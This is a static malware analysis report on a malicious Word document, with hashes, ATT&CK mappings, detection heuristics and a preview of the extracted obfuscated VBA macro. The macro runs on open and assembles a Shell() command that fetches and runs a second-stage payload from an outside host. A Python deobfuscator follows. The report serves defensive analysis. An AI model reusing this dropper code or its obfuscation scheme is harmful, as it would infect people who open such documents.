Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 585c2a90e4928f67…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 94.0 KB
Created: 2018-02-15 20:31:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0379b64a3fa17fa38024bb02c8e016bd
SHA-1: 53ee03d85bbb46b4fe60823e75a7b93808c33bc8
SHA-256: 585c2a90e4928f67af7be2d0bdc282b7eb6c90113ae588461a441d31b5268e88
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word document (OLE) carrying a VBA project that runs on open (AutoOpen) and calls Shell(). The command it launches is not present as a literal: it is assembled at run time from slices returned by the helper HJjkJKD(string, start, length), whose arguments line up with VBA Mid() semantics (1-based start, length in characters), and every slice is padded with junk tokens ('In4+In4', 'mhY+mhY', '7Pv+7Pv', plus a second layer consisting of a single-quoted plus sign spliced into those tokens, as in "mhY'+'+mhY"). Stripping those tokens from the slice assigned to rHwcz yields the URL fragment 'http://ccwclass.net', so the macro appears designed to download and execute a second-stage payload from that host; the slice assigned to SMnkz contains ".Split('?')", which is consistent with a '?'-separated list of download URLs being split and tried in turn. The arithmetic statements between the slices (CLng() of undeclared variables, Cos() of large constants) appear to be dead padding whose runtime errors, including the division by zero that CLng(Empty) produces, are swallowed by On Error Resume Next. ClamAV's dropper detection (Doc.Dropper.Agent-6450265-0) is consistent with this behaviour.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6450265-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450265-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA project calls Shell(), i.e. it can launch an external process from the document.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure runs as soon as the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no visible macro source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. By itself this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. Analyst note: the rule text assumes no modern VBA project was recovered, but for this sample one was (see OLE_VBA_MACROS and the extracted macros.bas below), so this finding is redundant with OLE_VBA_AUTOOPEN rather than independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). Analyst note: this is the standard DrawingML namespace URI present in ordinary Office files, not an indicator. The download URL is assembled at run time by the macro from obfuscated slices and is therefore not listed here.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                 Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)    24947 bytes
SHA-256: 1a0b4186b830423f578953b1a87e8efa916477034fe8c3faf9f83ecf4866b9d7

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "shsZkajzRu"
Function tBZNKmRONAqYw()
On Error Resume Next
fwXVPwYsrM = 27954 / CLng(ndzZqdmSdFRSJj) - 4967298 * Cos(5929553) + LfWfrGzHDnwmt + 5091346
bvrcDfrKi = 9107171 / CLng(WpwAqfo) - 690648 * Cos(1305337) + QFPuHMEzYpdRw + 4252638
YwzJiLMQEDf = 413976 / CLng(npnjkiWG) - 7438057 * Cos(8115323) + iDfqTYzqsr + 1773977
kTosmlOTnf = (WXhDnmjtkU) + HJjkJKD("CQfuJ+In4SDCmhY'+'+mhY);In4+In4&(In4+In4M49InvomhY+mhYIn4+In4mhY+mhYM49+M49kM4In4+In49In4+mhY7Pv+7Pv+mhYIn4+M49I7Pv+7Pvn4+In4eIn4+In4-ItemIn4+In4M7Pv+7Pv4In4+In49)(dIn4+In4YJ7Pv+7PvIn4+In4SDIn4+In4C);bEDcNkGOUwiSUOzwQSaRtBLOn", 6, 196)
jzBfDXzRo = 9790559 / CLng(szfJai) - 1845226 * Cos(229385) + qcQXhwDjjnrDzn + 762534
BiVbCI = 1790449 / CLng(BODHwJHYMuu) - 7704848 * Cos(9296000) + pOcSJSk + 4974456
wsjniaQrhSu = 3976993 / CLng(tOFHHuLcArc) - 9016104 * Cos(9552619) + sTIzVCIskZBoV + 3938186
SMnkz = (zPaJmjIHRiZvs) + HJjkJKD("LWsUmjwZnn4x7Pv+7PvIIn4+ImhY+mhYn4eDFfP/M49.S'+'In4+In4mhY+m7Pv+'+'7PvhYplit(M49?M49);dYJ'+'SIn4+In4D7Pv+7PvC =mhY+mhYIn'+'4+I'+'n4'+'ctnNozKE", 10, 125)
jXJotRG = 5853431 / CLng(GSZrhJtAAZb) - 1728628 * Cos(2857432) + iDUqFf + 7540556
mwGwQlrPRVh = 1313571 / CLng(iuEjMXbAO) - 971314 * Cos(4719870) + wrqkdKltrLRbA + 491215
KsINShV = 192872 / CLng(juwszvqzddhdZZ) - 2412297 * Cos(757320) + QkLdFbVBMjXcc + 6203867
rHwcz = (EmuRmaqJlESXA) + HJjkJKD("F7Pv+7Pvbiz/ms27r/?hIn4+In4ttp://ccwcmhY+mhYlamhY+mhYss.netIn4+IihCpOOFJjpofb", 2, 63)
HbuAn = 7895508 / CLng(aTcrmOSUA) - 9444787 * Cos(4415834) + vFszKW + 6395703
qLPEFk = 2101536 / CLng(wbsssOZPrws) - 6382695 * Cos(1629262) + AdoHoiYGDGBZM + 1140317
aJNCHkniA = 3102087 / CLng(NkilcrkwuA) - 8726054 * Cos(1082387) + AiZnLr + 3787455
HDKckidb = (DBtHAdIURwNlkS) + HJjkJKD("aY+In4t7Pv+7Pv'+'pIn4+In4://rIn4+In4waIn4+mhY+mhYI7Pv+7Pvn4ndIn4+In4bVKjuoniXWSlvCUNBjuaPEaLrY", 2, 67)
DQQKD = 3256347 / CLng(tqNnoT) - 9609135 * Cos(431383) + clBOwFzrBa + 7119310
wwmAzaXBOXk = 3684565 / CLng(HawZGrRXWPuiai) - 456346 * Cos(1021275) + stWKOhAFCLkP + 321892
kcLSXns = 9457017 / CLng(qujmpOMGkDF) - 4226372 * Cos(1202561) + VavmNhrznst + 9556580
iWqLH = (TzQiHDX) + HJjkJKD("MXHKnlWt(7Pv+7PvIn4+7Pv+7PvIn4100InmhY+mhY4+In4mhY+lzlwEpKtqkTIWVZiDRPo", 8, 44)
RcAjKZkEWE = 4804518 / CLng(lpcoPotGrsr) - 8900754 * Cos(1611195) + DukDropifW + 7786561
JrXOj = 439698 / CLng(LjiiD) - 9172087 * Cos(4477220) + rjjDawZEXYiXN + 6676967
EDHUqjkDUYi = 2424421 / CLng(IDkqHKGzM) - 6972216 * Cos(6562095) + IKowlfLOEz + 3259110
KliHLQ = (vQQYfnlHJLu) + HJjkJKD("cwCjiPCGMjhXaoFa7Pv+7Pvn4*mdr*7Pv+7PvIn4).NAmENQVXhJSwwOS", 17, 30)
zukoiml = 9790908 / CLng(NkjmhXzUImvajC) - 1573921 * Cos(8061454) + tFGwjonEsdo + 4438648
LYRmocGESQw = 1745494 / CLng(ZRitNdsJFV) - 8028971 * Cos(3419944) + PFGfRrI + 9372631
nwWjwhDu = 2083393 / CLng(zdvshotJzzLWI) - 452464 * Cos(1733956) + MpkAkISaXzmwX + 6163058
jHsKNvlHj = (jnhZjqqQ) + HJjkJKD("tmhY00,In7Pv+7Pv4+InmhY+mhY4 7Pv+7Pv2In4+In4'+'82133)In4+ImhY7Pv+7Pv+mhYn4;dYJIn4+In4A7Pv+7PvDIn4+7Pv+7PvIn4CX =In4+In4 M49 '+'In4+ImhY+mSUmwSDRqffkDOIQjCv", 2, 136)
AchlMRz = 9400405 / CLng(WXiTM) - 1964895 * Cos(1494543) + LUUiCulRwhHj + 4181810
twSaRwOop = 8693690 / CLng(adPpXQzYiC) - 6644928 * Cos(5526801) + BjRDRrEzQcSQaa + 3752108
dArZhtw = 3987069 / CLng(NicvDpwVjZLw) - 8198645 * Cos(6203666) + SmQSQDSi + 7900987
AsAirVFB = (lLULMsSCt) + HJjkJKD("obh dIn4+In4YJ'+'In4diBMFGU", 4, 17)
kRzsdVvuib = 3370524 / CLng(BZwwwoKBEhuDn) - 3332791 * Cos(8730111) + zzmkfswrTSiS + 5164460
sZLFn = 9121860 / CLng(kNwckEwZI) - 5875838 * Cos(5908764) + KuwMmDCVluhMJb + 1040701
SrOojjI = 5987694 / CLng(GraJMKqqoIk) - 86229 * Cos(4546071) + FBtnzWFvOY + 5048018
GALwIOf = (zEzrUih) + HJjkJKD("OPhMhfsadjTIn4nlIn4+mhY+mhYIn'+'4rIn4+In40IOadFIr0IleIn4+In4GIn4+In4jIn4+In48(dIn4+'+'In4YJaIn4+I'+'n4sfIn4+In4c.I
... (truncated)
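The reconstruction described in the summary, as an added worked example that is not part of the report, of oletools, or of the sample: a small Python deobfuscator that applies Mid() semantics to each HJjkJKD(...) call, strips the junk tokens, trims token fragments left at chunk boundaries, and pulls URLs from the result. The token list, the reading of HJjkJKD as Mid(), the reading of "M49" as a single quote and the boundary-trimming heuristic are all inferences from the visible chunks, not documented facts about the sample. The order in which the macro concatenates the chunks is not visible in the truncated source, so the example cleans each chunk on its own; the input is five statements copied from the macros.bas preview above.

```python
import re

# Junk tokens inferred from the extracted macro (assumption): three padding tokens
# plus a second layer, the literal three characters '+' (quote, plus, quote),
# which the generator spliced into the others (e.g. "mhY'+'+mhY").
JUNK_TOKENS = ("'+'", "7Pv+7Pv", "mhY+mhY", "In4+In4")
# Assumption: "M49" stands in for a single quote; the chunks contain "plit(M49?M49)".
QUOTE_PLACEHOLDER = "M49"

# HJjkJKD("...", start, length): the start/length pairs line up exactly with VBA
# Mid() semantics (1-based start), so the helper is treated as Mid().
CHUNK_RE = re.compile(r'HJjkJKD\("([^"]*)",\s*(\d+),\s*(\d+)\)')

# Constructed input: statements copied verbatim from the macros.bas preview.
SAMPLE_VBA = r'''
wsjniaQrhSu = 3976993 / CLng(tOFHHuLcArc) - 9016104 * Cos(9552619) + sTIzVCIskZBoV + 3938186
SMnkz = (zPaJmjIHRiZvs) + HJjkJKD("LWsUmjwZnn4x7Pv+7PvIIn4+ImhY+mhYn4eDFfP/M49.S'+'In4+In4mhY+m7Pv+'+'7PvhYplit(M49?M49);dYJ'+'SIn4+In4D7Pv+7PvC =mhY+mhYIn'+'4+I'+'n4'+'ctnNozKE", 10, 125)
rHwcz = (EmuRmaqJlESXA) + HJjkJKD("F7Pv+7Pvbiz/ms27r/?hIn4+In4ttp://ccwcmhY+mhYlamhY+mhYss.netIn4+IihCpOOFJjpofb", 2, 63)
HDKckidb = (DBtHAdIURwNlkS) + HJjkJKD("aY+In4t7Pv+7Pv'+'pIn4+In4://rIn4+In4waIn4+mhY+mhYI7Pv+7Pvn4ndIn4+In4bVKjuoniXWSlvCUNBjuaPEaLrY", 2, 67)
iWqLH = (TzQiHDX) + HJjkJKD("MXHKnlWt(7Pv+7PvIn4+7Pv+7PvIn4100InmhY+mhY4+In4mhY+lzlwEpKtqkTIWVZiDRPo", 8, 44)
AsAirVFB = (lLULMsSCt) + HJjkJKD("obh dIn4+In4YJ'+'In4diBMFGU", 4, 17)
'''


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): start is 1-based, length is a character count."""
    if start < 1:
        raise ValueError("Mid() start must be >= 1")
    return s[start - 1 : start - 1 + length]


def strip_junk(s: str, tokens=JUNK_TOKENS) -> str:
    """Remove junk tokens until nothing changes, so tokens nested inside
    tokens ("mhY'+'+mhY", "In4+7Pv+7PvIn4") collapse as well."""
    prev = None
    while prev != s:
        prev = s
        for t in tokens:
            s = s.replace(t, "")
    return s


def trim_partial_tokens(s: str, tokens=JUNK_TOKENS, min_len: int = 2) -> str:
    """Drop a junk-token fragment at either end of a chunk. The Mid() slices
    were cut at arbitrary offsets, so a token can straddle two chunks
    ("...In4+I" | "n4..."). Heuristic: fragments shorter than min_len stay."""
    changed = True
    while changed:
        changed = False
        for t in tokens:
            for k in range(len(t) - 1, min_len - 1, -1):
                if s.endswith(t[:k]):
                    s, changed = s[:-k], True
                if s.startswith(t[-k:]):
                    s, changed = s[k:], True
    return s


def deobfuscate(vba_source: str, quote: str = "'") -> list:
    """Return one cleaned string per HJjkJKD(...) call, in source order."""
    out = []
    for m in CHUNK_RE.finditer(vba_source):
        raw, start, length = m.group(1), int(m.group(2)), int(m.group(3))
        chunk = trim_partial_tokens(strip_junk(vba_mid(raw, start, length)))
        out.append(chunk.replace(QUOTE_PLACEHOLDER, quote))
    return out


URL_RE = re.compile(r"""https?://[A-Za-z0-9.-]+(?:/[^\s'"?;)]*)?""")


def find_urls(text: str) -> list:
    """URLs present in already-cleaned text (junk must be stripped first,
    otherwise a padding token glues itself onto the host name)."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    chunks = deobfuscate(SAMPLE_VBA)
    for c in chunks:
        print(repr(c))
    print("URLs:", find_urls(" ".join(chunks)))
```

Run stand-alone it prints the cleaned slices, among them "biz/ms27r/?http://ccwclass.net", "xIeDFfP/'.Split('?');dYJSDC =", "t(100" and " dYJ"; the leftover letters at the edges are where neighbouring slices join, which only resolves once the real concatenation order is known. Running this over the full macros.bas, rather than the five lines embedded here, is the next step an analyst would take.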